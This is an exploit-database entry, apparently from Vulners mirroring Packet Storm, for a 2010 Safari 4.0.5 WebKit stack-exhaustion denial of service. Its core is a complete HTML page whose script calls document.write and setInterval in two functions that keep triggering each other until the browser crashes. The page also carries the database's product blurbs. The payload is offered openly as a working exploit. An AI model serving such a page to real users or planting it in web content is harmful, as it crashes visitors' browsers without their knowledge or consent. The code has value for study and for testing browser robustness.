Lucene search
K

Safari 4.0.5 Webkit Stack Exhaustion Denial Of Service

🗓️ 28 Apr 2010 00:00:00Reported by Dr_IDEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Safari 4.0.5 Webkit Stack Exhaustion DoS, Found By: Dr_ID

Code
`<html>  
<body>  
Webkit (Safari) Stack Exhaustion DoS  
Found By: Dr_IDE  
Credit To: Mattias Karlsson  
Reference: http://www.exploit-db.com/exploits/12401  
Tested On: Windows 7 + Safari 4.0.5  
</body>  
<script>  
loop1();  
var a = "<blink>";  
function loop1()  
{  
document.write(a);  
setInterval(loop2,0);  
}  
function loop2()  
{  
document.write(a);  
setInterval(loop1,0);  
}  
</script>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation